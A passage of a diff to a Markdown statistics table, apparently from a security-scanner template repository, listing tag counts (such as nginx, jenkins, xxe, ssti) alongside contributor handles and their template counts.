| | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| gitlab | 8 | mavericknerd | 3 | | | | | | | -| cve2008 | 8 | sushantkamble | 3 | | | | | | | -| backup | 8 | me9187 | 3 | | | | | | | -| scada | 8 | sullo | 3 | | | | | | | -| rails | 8 | z3bd | 3 | | | | | | | -| ibm | 8 | shifacyclewala | 3 | | | | | | | -| ruijie | 8 | skeltavik | 3 | | | | | | | -| cnvd | 8 | idealphase | 3 | | | | | | | -| nginx | 8 | bp0lr | 2 | | | | | | | -| airflow | 8 | 0xrudra | 2 | | | | | | | -| microsoft | 8 | socketz | 2 | | | | | | | -| fastjson | 8 | g4l1t0 | 2 | | | | | | | -| netgear | 7 | 0xsapra | 2 | | | | | | | -| cms | 7 | w4cky_ | 2 | | | | | | | +| dns | 13 | nodauf | 4 | | | | | | | +| android | 13 | github.com/its0x08 | 4 | | | | | | | +| zoho | 13 | z3bd | 3 | | | | | | | +| adobe | 13 | shifacyclewala | 3 | | | | | | | +| dlink | 12 | dudez | 3 | | | | | | | +| wp-theme | 12 | binaryfigments | 3 | | | | | | | +| jenkins | 12 | mavericknerd | 3 | | | | | | | +| manageengine | 12 | idealphase | 3 | | | | | | | +| cve2013 | 11 | skeltavik | 3 | | | | | | | +| magento | 11 | _generic_human_ | 3 | | | | | | | +| intrusive | 10 | yash anand @yashanand155 | 3 | | | | | | | +| hp | 10 | 0w4ys | 3 | | | | | | | +| dell | 10 | sullo | 3 | | | | | | | +| xxe | 10 | me9187 | 3 | | | | | | | +| kubernetes | 9 | sushantkamble | 3 | | | | | | | +| vmware | 9 | vsh00t | 3 | | | | | | | +| ftp | 9 | unstabl3 | 3 | | | | | | | +| cnvd | 8 | impramodsargar | 3 | | | | | | | +| nginx | 8 | fyoorer | 3 | | | | | | | +| microsoft | 8 | jarijaas | 3 | | | | | | | +| scada | 8 | f1tz | 3 | | | | | | | +| ibm | 8 | shine | 3 | | | | | | | +| airflow | 8 | emenalf | 3 | | | | | | | +| rails | 8 | thomas_from_offensity | 3 | | | | | | | +| ruijie | 8 | johnjhacking | 3 | | | | | | | +| fastjson | 8 | joeldeleep | 2 | | | | | | | +| gitlab | 8 | bp0lr | 2 | | | | | | | +| cve2008 | 8 | g4l1t0 | 2 | | | | | | | +| backup | 8 | bing0o | 2 | | | | | | | +| cms | 7 | mohammedsaneem | 2 | | | | | | | +| coldfusion | 7 | w4cky_ | 2 | | | | | | | +| netgear | 7 | randomrobbie | 2 | | | | | | | +| files | 7 | kiblyn11 | 2 | | | | | | | | confluence | 7 | udit_thakkur | 2 | | | | | | | -| coldfusion | 7 | bernardofsr | 2 | | | | | | | -| files | 7 | arcc | 2 | | | | | | | -| drupal | 6 | r3naissance | 2 | | | | | | | -| jetty | 6 | 0xelkomy | 2 | | | | | | | -| laravel | 6 | parth | 2 | | | | | | | -| docker | 6 | 0xsmiley | 2 | | | | | | | -| nodejs | 6 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| solr | 6 | pxmme1337 | 2 | | | | | | | -| lucee | 6 | dheerajmadhukar | 2 | | | | | | | -| rconfig | 6 | koti2 | 2 | | | | | | | -| django | 6 | hetroublemakr | 2 | | | | | | | -| fileupload | 6 | davidmckennirey | 2 | | | | | | | -| api | 6 | huowuzhao | 2 | | | | | | | -| camera | 6 | vavkamil | 2 | | | | | | | -| citrix | 6 | amsda | 2 | | | | | | | -| windows | 5 | mohammedsaneem | 2 | | | | | | | -| jolokia | 5 | fabaff | 2 | | | | | | | -| ssti | 5 | sy3omda | 2 | | | | | | | -| iis | 5 | cocxanh | 2 | | | | | | | -| tomcat | 5 | foulenzer | 2 | | | | | | | -| java | 5 | r12w4n | 2 | | | | | | | -| phpmyadmin | 5 | hahwul | 2 | | | | | | | -| printer | 5 | whoever | 2 | | | | | | | -| dedecms | 5 | x1m_martijn | 2 | | | | | | | -| crlf | 5 | gevakun | 2 | | | | | | | -| headless | 5 | kiblyn11 | 2 | | | | | | | -| circarlife | 5 | joeldeleep | 2 | | | | | | | -| solarwinds | 4 | 0xprial | 2 | | | | | | | -| thinkphp | 4 | afaq | 2 | | | | | | | -| npm | 4 | ree4pwn | 2 | | | | | | | -| strapi | 4 | gal nagli | 2 | | | | | | | -| resin | 4 | randomrobbie | 2 | | | | | | | -| thinkcmf | 4 | manas_harsh | 2 | | | | | | | -| grafana | 4 | nkxxkn | 2 | | | | | | | -| webserver | 4 | zomsop82 | 2 | | | | | | | -| hongdian | 4 | 0xcrypto | 2 | | | | | | | -| fatpipe | 4 | random-robbie | 2 | | | | | | | +| drupal | 6 | koti2 | 2 | | | | | | | +| laravel | 6 | davidmckennirey | 2 | | | | | | | +| phpmyadmin | 6 | arcc | 2 | | | | | | | +| camera | 6 | gal nagli | 2 | | | | | | | +| solr | 6 | parth | 2 | | | | | | | +| citrix | 6 | huowuzhao | 2 | | | | | | | +| lucee | 6 | hetroublemakr | 2 | | | | | | | +| nodejs | 6 | 0xcrypto | 2 | | | | | | | +| jetty | 6 | nkxxkn | 2 | | | | | | | +| docker | 6 | swissky | 2 | | | | | | | +| fileupload | 6 | dheerajmadhukar | 2 | | | | | | | +| rconfig | 6 | lotusdll | 2 | | | | | | | +| django | 6 | 0xsmiley | 2 | | | | | | | +| api | 6 | r3naissance | 2 | | | | | | | +| printer | 5 | gevakun | 2 | | | | | | | +| jolokia | 5 | pxmme1337 | 2 | | | | | | | +| tomcat | 5 | x1m_martijn | 2 | | | | | | | +| java | 5 | ehsahil | 2 | | | | | | | +| headless | 5 | socketz | 2 | | | | | | | +| circarlife | 5 | r12w4n | 2 | | | | | | | +| ssti | 5 | whoever | 2 | | | | | | | +| crlf | 5 | ree4pwn | 2 | | | | | | | +| dedecms | 5 | alifathi-h1 | 2 | | | | | | | +| windows | 5 | afaq | 2 | | | | | | | +| iis | 5 | convisoappsec | 2 | | | | | | | +| npm | 4 | bernardofsr | 2 | | | | | | | +| amazon | 4 | vavkamil | 2 | | | | | | | +| zabbix | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| fatpipe | 4 | 0xprial | 2 | | | | | | | +| samsung | 4 | 0xsapra | 2 | | | | | | | +| hongdian | 4 | amsda | 2 | | | | | | | +| solarwinds | 4 | random-robbie | 2 | | | | | | | +| slack | 4 | moritz nentwig | 2 | | | | | | | +| thinkphp | 4 | 0xelkomy | 2 | | | | | | | | elastic | 4 | bsysop | 2 | | | | | | | -| maps | 4 | moritz nentwig | 2 | | | | | | | -| exchange | 4 | alifathi-h1 | 2 | | | | | | | -| traversal | 4 | swissky | 2 | | | | | | | -| firmware | 4 | bing0o | 2 | | | | | | | -| rfi | 4 | convisoappsec | 2 | | | | | | | -| samsung | 4 | lotusdll | 2 | | | | | | | -| symantec | 4 | ehsahil | 2 | | | | | | | -| amazon | 4 | mubassirpatel | 1 | | | | | | | -| symfony | 4 | smaranchand | 1 | | | | | | | -| zabbix | 4 | omarkurt | 1 | | | | | | | -| wso2 | 4 | thevillagehacker | 1 | | | | | | | -| asp | 4 | mhdsamx | 1 | | | | | | | -| glpi | 4 | micha3lb3n | 1 | | | | | | | -| firebase | 4 | taielab | 1 | | | | | | | -| zimbra | 4 | luskabol | 1 | | | | | | | -| vpn | 4 | iampritam | 1 | | | | | | | -| git | 4 | hanlaomo | 1 | | | | | | | -| artifactory | 4 | ohlinge | 1 | | | | | | | -| slack | 4 | regala_ | 1 | | | | | | | -| buffalo | 4 | petruknisme | 1 | | | | | | | -| magmi | 4 | j33n1k4 | 1 | | | | | | | -| proxy | 4 | tirtha_mandal | 1 | | | | | | | -| moodle | 4 | 0ut0fb4nd | 1 | | | | | | | -| fpd | 3 | aceseven (digisec360) | 1 | | | | | | | -| nosqli | 3 | soyelmago | 1 | | | | | | | -| jeesns | 3 | 0xteles | 1 | | | | | | | -| caucho | 3 | wabafet | 1 | | | | | | | -| openam | 3 | evolutionsec | 1 | | | | | | | -| tikiwiki | 3 | udyz | 1 | | | | | | | -| terramaster | 3 | yashgoti | 1 | | | | | | | -| springcloud | 3 | akash.c | 1 | | | | | | | -| ebs | 3 | alperenkesk | 1 | | | | | | | -| lansweeper | 3 | dawid-czarnecki | 1 | | | | | | | -| cacti | 3 | kba@sogeti_esec | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| exposures | 3 | naglinagli | 1 | | | | | | | -| lfr | 3 | elder tao | 1 | | | | | | | -| prometheus | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| vbulletin | 3 | sec_hawk | 1 | | | | | | | -| httpd | 3 | elouhi | 1 | | | | | | | -| smtp | 3 | alex | 1 | | | | | | | -| fanruan | 3 | pudsec | 1 | | | | | | | -| itop | 3 | jrolf | 1 | | | | | | | -| cve2007 | 3 | qlkwej | 1 | | | | | | | -| kevinlab | 3 | co0nan | 1 | | | | | | | -| mail | 3 | oscarintherocks | 1 | | | | | | | -| backdoor | 3 | manuelbua | 1 | | | | | | | -| ofbiz | 3 | affix | 1 | | | | | | | -| r-seenet | 3 | vzamanillo | 1 | | | | | | | -| opensis | 3 | noamrathaus | 1 | | | | | | | -| kafka | 3 | @dwisiswant0 | 1 | | | | | | | -| openssh | 3 | un-fmunozs | 1 | | | | | | | -| cloud | 3 | notsoevilweasel | 1 | | | | | | | -| github | 3 | andirrahmani1 | 1 | | | | | | | -| jellyfin | 3 | shelld3v | 1 | | | | | | | -| search | 3 | bad5ect0r | 1 | | | | | | | -| hoteldruid | 3 | nytr0gen | 1 | | | | | | | -| log | 3 | its0x08 | 1 | | | | | | | -| druid | 3 | mesaglio | 1 | | | | | | | -| linkerd | 3 | 52971 | 1 | | | | | | | -| targa | 3 | ratnadip gajbhiye | 1 | | | | | | | -| nacos | 3 | flag007 | 1 | | | | | | | -| microstrategy | 3 | mass0ma | 1 | | | | | | | -| node | 3 | deena | 1 | | | | | | | -| injection | 3 | 0xtavian | 1 | | | | | | | -| cves | 3 | @ofjaaah | 1 | | | | | | | -| bitrix | 3 | b4uh0lz | 1 | | | | | | | -| nexus | 3 | apt-mirror | 1 | | | | | | | -| bigip | 3 | whynotke | 1 | | | | | | | -| oa | 3 | _darrenmartyn | 1 | | | | | | | -| ssh | 3 | knassar702 | 1 | | | | | | | -| azure | 3 | gboddin | 1 | | | | | | | -| zhiyuan | 3 | c3l3si4n | 1 | | | | | | | -| mongodb | 3 | rojanrijal | 1 | | | | | | | -| kibana | 3 | jeya seelan | 1 | | | | | | | -| mcafee | 2 | luci | 1 | | | | | | | -| nextcloud | 2 | sicksec | 1 | | | | | | | -| xxljob | 2 | bolli95 | 1 | | | | | | | -| bruteforce | 2 | push4d | 1 | | | | | | | -| hashicorp | 2 | defr0ggy | 1 | | | | | | | -| ec2 | 2 | ahmed sherif | 1 | | | | | | | -| wuzhicms | 2 | 0xd0ff9 | 1 | | | | | | | -| axis | 2 | shreyapohekar | 1 | | | | | | | -| netis | 2 | infosecsanyam | 1 | | | | | | | -| splunk | 2 | forgedhallpass | 1 | | | | | | | -| chiyu | 2 | aaron_costello | 1 | | | | | | | +| git | 4 | manas_harsh | 2 | | | | | | | +| moodle | 4 | zomsop82 | 2 | | | | | | | +| webserver | 4 | sy3omda | 2 | | | | | | | +| buffalo | 4 | 0xrudra | 2 | | | | | | | +| strapi | 4 | fabaff | 2 | | | | | | | +| magmi | 4 | hahwul | 2 | | | | | | | +| maps | 4 | foulenzer | 2 | | | | | | | +| proxy | 4 | cocxanh | 2 | | | | | | | +| grafana | 4 | push4d | 1 | | | | | | | +| rfi | 4 | thevillagehacker | 1 | | | | | | | +| firmware | 4 | elouhi | 1 | | | | | | | +| thinkcmf | 4 | kurohost | 1 | | | | | | | +| firebase | 4 | naglinagli | 1 | | | | | | | +| resin | 4 | sicksec | 1 | | | | | | | +| exchange | 4 | luci | 1 | | | | | | | +| vpn | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | +| glpi | 4 | makyotox | 1 | | | | | | | +| wso2 | 4 | undefl0w | 1 | | | | | | | +| artifactory | 4 | patralos | 1 | | | | | | | +| symfony | 4 | omarkurt | 1 | | | | | | | +| zimbra | 4 | bolli95 | 1 | | | | | | | +| symantec | 4 | orpheus | 1 | | | | | | | +| traversal | 4 | cristi vlad (@cristivlad25) | 1 | | | | | | | +| asp | 4 | infosecsanyam | 1 | | | | | | | +| kibana | 3 | oscarintherocks | 1 | | | | | | | +| kafka | 3 | intx0x80 | 1 | | | | | | | +| ebs | 3 | wabafet | 1 | | | | | | | +| vbulletin | 3 | borna nematzadeh | 1 | | | | | | | +| mongodb | 3 | nerrorsec | 1 | | | | | | | +| azure | 3 | becivells | 1 | | | | | | | +| hoteldruid | 3 | remonsec | 1 | | | | | | | +| lansweeper | 3 | andirrahmani1 | 1 | | | | | | | +| backdoor | 3 | @ofjaaah | 1 | | | | | | | +| tikiwiki | 3 | yashanand155 | 1 | | | | | | | +| druid | 3 | toufik airane | 1 | | | | | | | +| bigip | 3 | exploitation | 1 | | | | | | | +| openssh | 3 | alex | 1 | | | | | | | +| httpd | 3 | b0rn2r00t | 1 | | | | | | | +| springcloud | 3 | smaranchand | 1 | | | | | | | +| cves | 3 | akash.c | 1 | | | | | | | +| cloud | 3 | raesene | 1 | | | | | | | +| fanruan | 3 | aresx | 1 | | | | | | | +| smtp | 3 | juicypotato1 | 1 | | | | | | | +| openam | 3 | forgedhallpass | 1 | | | | | | | +| kevinlab | 3 | mah3sec_ | 1 | | | | | | | +| nosqli | 3 | shreyapohekar | 1 | | | | | | | +| ssh | 3 | 0xrod | 1 | | | | | | | +| mail | 3 | 0h1in9e | 1 | | | | | | | +| terramaster | 3 | berkdusunur | 1 | | | | | | | +| nacos | 3 | retr0 | 1 | | | | | | | +| node | 3 | b4uh0lz | 1 | | | | | | | +| prometheus | 3 | notsoevilweasel | 1 | | | | | | | +| jeesns | 3 | @dwisiswant0 | 1 | | | | | | | +| oa | 3 | jteles | 1 | | | | | | | +| search | 3 | c3l3si4n | 1 | | | | | | | +| exposures | 3 | chron0x | 1 | | | | | | | +| lfr | 3 | mubassirpatel | 1 | | | | | | | +| ofbiz | 3 | schniggie | 1 | | | | | | | +| opensis | 3 | d0rkerdevil | 1 | | | | | | | +| injection | 3 | izn0u | 1 | | | | | | | +| microstrategy | 3 | ahmed sherif | 1 | | | | | | | +| cve2007 | 3 | 0xd0ff9 | 1 | | | | | | | +| caucho | 3 | thebinitghimire | 1 | | | | | | | +| targa | 3 | mass0ma | 1 | | | | | | | +| log | 3 | _harleo | 1 | | | | | | | +| linkerd | 3 | rodnt | 1 | | | | | | | +| jellyfin | 3 | willd96 | 1 | | | | | | | +| nexus | 3 | furkansenan | 1 | | | | | | | +| cacti | 3 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| rstudio | 2 | yavolo | 1 | | | | | | | -| yii | 2 | toufik airane | 1 | | | | | | | -| ucmdb | 2 | ooooooo_q | 1 | | | | | | | -| frp | 2 | mah3sec_ | 1 | | | | | | | -| smb | 2 | akshansh | 1 | | | | | | | -| guacamole | 2 | remonsec | 1 | | | | | | | -| ecology | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| rancher | 2 | kre80r | 1 | | | | | | | -| jeedom | 2 | thebinitghimire | 1 | | | | | | | -| s3 | 2 | th3.d1p4k | 1 | | | | | | | -| icewarp | 2 | 0h1in9e | 1 | | | | | | | -| bucket | 2 | alph4byt3 | 1 | | | | | | | -| places | 2 | rotemreiss | 1 | | | | | | | -| tidb | 2 | clarkvoss | 1 | | | | | | | -| hostheader-injection | 2 | cookiehanhoan | 1 | | | | | | | -| getsimple | 2 | ldionmarcil | 1 | | | | | | | -| hasura | 2 | nerrorsec | 1 | | | | | | | -| maian | 2 | @github.com/defr0ggy | 1 | | | | | | | -| heroku | 2 | brabbit10 | 1 | | | | | | | -| voipmonitor | 2 | fopina | 1 | | | | | | | -| text | 2 | d0rkerdevil | 1 | | | | | | | -| cve2005 | 2 | s1r1u5_ | 1 | | | | | | | -| trixbox | 2 | pratik khalane | 1 | | | | | | | -| hjtcloud | 2 | yashanand155 | 1 | | | | | | | -| sitecore | 2 | tim_koopmans | 1 | | | | | | | -| totemomail | 2 | zhenwarx | 1 | | | | | | | -| cache | 2 | hakluke | 1 | | | | | | | -| saltstack | 2 | raesene | 1 | | | | | | | -| showdoc | 2 | chron0x | 1 | | | | | | | -| axis2 | 2 | _c0wb0y_ | 1 | | | | | | | -| wordfence | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| yapi | 2 | b0yd | 1 | | | | | | | -| db | 2 | blckraven | 1 | | | | | | | -| prestashop | 2 | ahmetpergamum | 1 | | | | | | | -| jboss | 2 | lark lab | 1 | | | | | | | -| activemq | 2 | schniggie | 1 | | | | | | | -| justwriting | 2 | retr0 | 1 | | | | | | | -| hpe | 2 | patralos | 1 | | | | | | | -| vcenter | 2 | 0xrod | 1 | | | | | | | -| horde | 2 | pdp | 1 | | | | | | | -| kong | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| upload | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| fpd | 3 | taielab | 1 | | | | | | | +| itop | 3 | ohlinge | 1 | | | | | | | +| bitrix | 3 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| zhiyuan | 3 | nvn1729 | 1 | | | | | | | +| github | 3 | tim_koopmans | 1 | | | | | | | +| r-seenet | 3 | j33n1k4 | 1 | | | | | | | +| telerik | 3 | udyz | 1 | | | | | | | +| bypass | 2 | ratnadip gajbhiye | 1 | | | | | | | +| prestashop | 2 | luskabol | 1 | | | | | | | +| idrac | 2 | ldionmarcil | 1 | | | | | | | +| flir | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| smb | 2 | adrianmf | 1 | | | | | | | +| jeedom | 2 | evolutionsec | 1 | | | | | | | +| minio | 2 | affix | 1 | | | | | | | +| phpcollab | 2 | gboddin | 1 | | | | | | | +| huawei | 2 | mhdsamx | 1 | | | | | | | +| jboss | 2 | yavolo | 1 | | | | | | | +| getsimple | 2 | rotemreiss | 1 | | | | | | | +| aruba | 2 | zandros0 | 1 | | | | | | | +| axis2 | 2 | deena | 1 | | | | | | | +| wordfence | 2 | 52971 | 1 | | | | | | | +| saltstack | 2 | hanlaomo | 1 | | | | | | | +| hostheader-injection | 2 | petruknisme | 1 | | | | | | | +| vrealize | 2 | nytr0gen | 1 | | | | | | | +| frp | 2 | th3.d1p4k | 1 | | | | | | | +| icewarp | 2 | _darrenmartyn | 1 | | | | | | | +| cve2005 | 2 | @github.com/defr0ggy | 1 | | | | | | | +| mida | 2 | kre80r | 1 | | | | | | | +| waf | 2 | kabirsuda | 1 | | | | | | | +| service | 2 | alph4byt3 | 1 | | | | | | | +| hjtcloud | 2 | knassar702 | 1 | | | | | | | +| upload | 2 | philippdelteil | 1 | | | | | | | +| lotus | 2 | elmahdi | 1 | | | | | | | +| activemq | 2 | blckraven | 1 | | | | | | | +| qihang | 2 | sec_hawk | 1 | | | | | | | +| guacamole | 2 | yashgoti | 1 | | | | | | | +| plesk | 2 | co0nan | 1 | | | | | | | +| hasura | 2 | alperenkesk | 1 | | | | | | | +| bucket | 2 | kba@sogeti_esec | 1 | | | | | | | +| linux | 2 | b0yd | 1 | | | | | | | +| dos | 2 | absshax | 1 | | | | | | | +| nextcloud | 2 | streetofhackerr007 | 1 | | | | | | | +| pega | 2 | whynotke | 1 | | | | | | | +| adminer | 2 | noamrathaus | 1 | | | | | | | +| axis | 2 | ahmetpergamum | 1 | | | | | | | +| dolibarr | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| adminer | 2 | nvn1729 | 1 | | | | | | | -| pega | 2 | ilovebinbash | 1 | | | | | | | -| status | 2 | daviey | 1 | | | | | | | -| backups | 2 | _harleo | 1 | | | | | | | -| flir | 2 | bernardo rodrigues | 1 | | | | | | | +| couchdb | 2 | aceseven (digisec360) | 1 | | | | | | | +| s3 | 2 | elder tao | 1 | | | | | | | +| netsweeper | 2 | sickwell | 1 | | | | | | | +| qcubed | 2 | shifacyclewla | 1 | | | | | | | +| globalprotect | 2 | lark lab | 1 | | | | | | | +| favicon | 2 | mesaglio | 1 | | | | | | | +| embed | 2 | droberson | 1 | | | | | | | +| commax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| places | 2 | 0xtavian | 1 | | | | | | | +| oauth | 2 | ajaysenr | 1 | | | | | | | +| webcam | 2 | bjhulst | 1 | | | | | | | +| backups | 2 | cookiehanhoan | 1 | | | | | | | +| vcenter | 2 | ringo | 1 | | | | | | | +| totemomail | 2 | hakluke | 1 | | | | | | | +| yii | 2 | brabbit10 | 1 | | | | | | | +| text | 2 | kareemse1im | 1 | | | | | | | +| db | 2 | regala_ | 1 | | | | | | | +| glassfish | 2 | pudsec | 1 | | | | | | | +| rockmongo | 2 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| nextjs | 2 | sshell | 1 | | | | | | | -| service | 2 | aresx | 1 | | | | | | | -| embed | 2 | undefl0w | 1 | | | | | | | -| shellshock | 2 | izn0u | 1 | | | | | | | -| sonarqube | 2 | borna nematzadeh | 1 | | | | | | | -| harbor | 2 | xstp | 1 | | | | | | | -| glassfish | 2 | juicypotato1 | 1 | | | | | | | -| igs | 2 | zandros0 | 1 | | | | | | | -| enumeration | 2 | furkansenan | 1 | | | | | | | -| dolibarr | 2 | bjhulst | 1 | | | | | | | -| aruba | 2 | rodnt | 1 | | | | | | | -| ilo | 2 | revblock | 1 | | | | | | | -| chyrp | 2 | adrianmf | 1 | | | | | | | -| seeyon | 2 | b0rn2r00t | 1 | | | | | | | -| waf | 2 | kurohost | 1 | | | | | | | -| akamai | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| sharepoint | 2 | ipanda | 1 | | | | | | | -| rockmongo | 2 | sickwell | 1 | | | | | | | -| mida | 2 | jteles | 1 | | | | | | | -| middleware | 2 | makyotox | 1 | | | | | | | -| plesk | 2 | droberson | 1 | | | | | | | -| electron | 2 | orpheus | 1 | | | | | | | -| odoo | 2 | intx0x80 | 1 | | | | | | | -| lotus | 2 | becivells | 1 | | | | | | | -| natshell | 2 | absshax | 1 | | | | | | | -| qihang | 2 | ajaysenr | 1 | | | | | | | -| kentico | 2 | streetofhackerr007 | 1 | | | | | | | -| paloalto | 2 | thezakman | 1 | | | | | | | -| avantfax | 2 | philippdelteil | 1 | | | | | | | -| favicon | 2 | elmahdi | 1 | | | | | | | -| ecoa | 2 | shifacyclewla | 1 | | | | | | | -| oauth | 2 | ringo | 1 | | | | | | | -| huawei | 2 | x6263 | 1 | | | | | | | -| dos | 2 | geraldino2 | 1 | | | | | | | -| openvpn | 2 | willd96 | 1 | | | | | | | -| aviatrix | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| nagios | 2 | andysvints | 1 | | | | | | | -| bitly | 2 | exploitation | 1 | | | | | | | -| phpcollab | 2 | kareemse1im | 1 | | | | | | | -| vrealize | 2 | kabirsuda | 1 | | | | | | | -| openfire | 2 | berkdusunur | 1 | | | | | | | -| fortios | 2 | | | | | | | | | -| payara | 2 | | | | | | | | | -| mailchimp | 2 | | | | | | | | | -| chamilo | 2 | | | | | | | | | -| netsweeper | 2 | | | | | | | | | -| couchdb | 2 | | | | | | | | | -| spark | 2 | | | | | | | | | -| liferay | 2 | | | | | | | | | -| commax | 2 | | | | | | | | | -| keycloak | 2 | | | | | | | | | -| bypass | 2 | | | | | | | | | -| geowebserver | 2 | | | | | | | | | -| webcam | 2 | | | | | | | | | +| fortios | 2 | manuelbua | 1 | | | | | | | +| chyrp | 2 | tirtha_mandal | 1 | | | | | | | +| ucmdb | 2 | xstp | 1 | | | | | | | +| akamai | 2 | shelld3v | 1 | | | | | | | +| shellshock | 2 | pdp | 1 | | | | | | | +| middleware | 2 | defr0ggy | 1 | | | | | | | +| igs | 2 | dawid-czarnecki | 1 | | | | | | | +| sonarqube | 2 | flag007 | 1 | | | | | | | +| ecoa | 2 | micha3lb3n | 1 | | | | | | | +| keycloak | 2 | jeya seelan | 1 | | | | | | | +| bitly | 2 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| akkadian | 2 | akshansh | 1 | | | | | | | +| kong | 2 | bad5ect0r | 1 | | | | | | | +| chamilo | 2 | thezakman | 1 | | | | | | | +| wuzhicms | 2 | soyelmago | 1 | | | | | | | +| horde | 2 | s1r1u5_ | 1 | | | | | | | +| nextjs | 2 | un-fmunozs | 1 | | | | | | | +| payara | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| electron | 2 | iampritam | 1 | | | | | | | +| prtg | 2 | 0xteles | 1 | | | | | | | +| voipmonitor | 2 | pratik khalane | 1 | | | | | | | +| bruteforce | 2 | fmunozs | 1 | | | | | | | +| sharepoint | 2 | x6263 | 1 | | | | | | | +| rancher | 2 | clarkvoss | 1 | | | | | | | +| openfire | 2 | geraldino2 | 1 | | | | | | | +| maian | 2 | ipanda | 1 | | | | | | | +| xxljob | 2 | sshell | 1 | | | | | | | +| status | 2 | zhenwarx | 1 | | | | | | | +| sonicwall | 2 | apt-mirror | 1 | | | | | | | +| liferay | 2 | andysvints | 1 | | | | | | | +| avantfax | 2 | revblock | 1 | | | | | | | +| netis | 2 | fopina | 1 | | | | | | | +| splunk | 2 | _c0wb0y_ | 1 | | | | | | | +| odoo | 2 | ooooooo_q | 1 | | | | | | | +| openvpn | 2 | 0ut0fb4nd | 1 | | | | | | | +| ilo | 2 | qlkwej | 1 | | | | | | | +| mailchimp | 2 | daviey | 1 | | | | | | | +| justwriting | 2 | jrolf | 1 | | | | | | | +| rstudio | 2 | rojanrijal | 1 | | | | | | | +| chiyu | 2 | its0x08 | 1 | | | | | | | +| kentico | 2 | vzamanillo | 1 | | | | | | | +| enumeration | 2 | ilovebinbash | 1 | | | | | | | | jsf | 2 | | | | | | | | | +| hpe | 2 | | | | | | | | | +| mcafee | 2 | | | | | | | | | +| tidb | 2 | | | | | | | | | | grav | 2 | | | | | | | | | -| qcubed | 2 | | | | | | | | | -| minio | 2 | | | | | | | | | -| sonicwall | 2 | | | | | | | | | -| emerge | 2 | | | | | | | | | -| storage | 2 | | | | | | | | | -| prtg | 2 | | | | | | | | | -| linux | 2 | | | | | | | | | +| cache | 2 | | | | | | | | | +| sitecore | 2 | | | | | | | | | +| natshell | 2 | | | | | | | | | | leak | 2 | | | | | | | | | -| globalprotect | 2 | | | | | | | | | -| idrac | 2 | | | | | | | | | -| akkadian | 2 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| lokalise | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| roads | 1 | | | | | | | | | -| pivotaltracker | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| messaging | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| flexbe | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| travis | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| playable | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| basic-auth | 1 | | | | | | | | | -| nerdgraph | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| buttercms | 1 | | | | | | | | | -| square | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| websphere | 1 | | | | | | | | | -| tugboat | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| circle | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| etherpad | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| cscart | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | +| trixbox | 2 | | | | | | | | | +| geowebserver | 2 | | | | | | | | | +| harbor | 2 | | | | | | | | | +| yapi | 2 | | | | | | | | | +| aviatrix | 2 | | | | | | | | | +| spark | 2 | | | | | | | | | +| paloalto | 2 | | | | | | | | | +| storage | 2 | | | | | | | | | +| emerge | 2 | | | | | | | | | +| heroku | 2 | | | | | | | | | +| seeyon | 2 | | | | | | | | | +| showdoc | 2 | | | | | | | | | +| nagios | 2 | | | | | | | | | +| hashicorp | 2 | | | | | | | | | +| ecology | 2 | | | | | | | | | +| ec2 | 2 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | | weiphp | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| shopware | 1 